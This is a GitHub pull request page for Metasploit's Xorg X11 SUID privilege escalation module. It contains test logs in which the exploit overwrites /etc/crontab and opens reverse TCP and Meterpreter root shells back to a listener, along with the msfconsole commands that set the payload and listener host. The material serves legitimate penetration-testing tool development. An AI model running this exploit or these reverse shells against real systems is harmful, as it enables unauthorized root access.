
Improve Xorg_privesc module consolelock check, payload upload & formatting #11015

Merged
merged 2 commits into from
Nov 25, 2018

Conversation

aringo
Contributor

@aringo aringo commented Nov 24, 2018

Was asked to make some adjustments to the check for console lock along with payload upload and formatting. Adjusted and then tested on CentOS and OpenBSD 6.4.

msf5 exploit(multi/local/xorg_x11_suid_server) > exploit 

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.30.0.2:4444 
[*] Running additional check for Linux
[+] Console lock for peep
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.5 is vulnerable
[+] Xorg does not appear running
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Max line length is 65537
[*] Writing 911224 bytes in 56 chunks of 39672 bytes (octal-encoded), using printf
[*] Next chunk is 43977 bytes
....... snipped ............
[*] Next chunk is 40137 bytes
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Meterpreter session 2 opened (172.30.0.2:4444 -> 172.30.0.60:40608) at 2018-11-24 14:44:13 -0600
[+] Returning session after cleaning
[+] Deleted /tmp/.session-zJFbtiW

meterpreter > cat /etc/crontab
original
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.5.1804 (Linux 3.10.0-862.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

@bcoles bcoles mentioned this pull request Nov 24, 2018
@bcoles bcoles self-requested a review November 24, 2018 21:27
@bcoles
Contributor

bcoles commented Nov 24, 2018

Thanks. Apologies for the confusion. I didn't have a chance to test the previous PR before it was landed.

I'll retest this and land.

@bcoles
Contributor

bcoles commented Nov 25, 2018

CentOS - Command Shell payload

msf5 exploit(multi/local/xorg_x11_suid_server) > run

[*] Started reverse double SSL handler on 172.16.191.188:4444 
[*] Running additional check for Linux
[+] Console lock for user
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.3 is vulnerable
[!] Xorg in process list
[!] Could not get version or Xorg process possibly running, may fail
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zk0jobDMxFdBxLBU;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "zk0jobDMxFdBxLBU\n"
[*] Matching...
[*] B is input...
[*] Command shell session 7 opened (172.16.191.188:4444 -> 172.16.191.141:46318) at 2018-11-24 21:31:04 -0500
[*] Waiting on cron to run
[+] Returning session after cleaning
[+] Deleted /tmp/.session-Tafw0iW0r8

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
uname -a
Linux centos-7-1708.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 7? [y/N]  y
""

[*] 172.16.191.141 - Command shell session 7 closed.  Reason: User exit

CentOS - Meterpreter payload

msf5 exploit(multi/local/xorg_x11_suid_server) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(multi/local/xorg_x11_suid_server) > set target 1
target => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Running additional check for Linux
[+] Console lock for user
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.3 is vulnerable
[!] Xorg in process list
[!] Could not get version or Xorg process possibly running, may fail
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (816260 bytes) to 172.16.191.141
[*] Meterpreter session 8 opened (172.16.191.188:4444 -> 172.16.191.141:46320) at 2018-11-24 21:32:02 -0500
[+] Returning session after cleaning
[+] Deleted /tmp/.session-hFXoMJcW0

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : centos-7-1708.localdomain
OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.191.141 - Meterpreter session 8 closed.  Reason: User exit
msf5 exploit(multi/local/xorg_x11_suid_server) > 

@bcoles bcoles merged commit 93db7b3 into rapid7:master Nov 25, 2018
@bcoles
Contributor

bcoles commented Nov 25, 2018

Release Notes

This fixes various issues related to Linux targets in the Xorg X11 Server SUID privilege escalation module.

@gdavidson-r7 gdavidson-r7 added the rn-enhancement (release notes enhancement) and rn-fix (release notes fix) labels and removed the rn-enhancement label Dec 3, 2018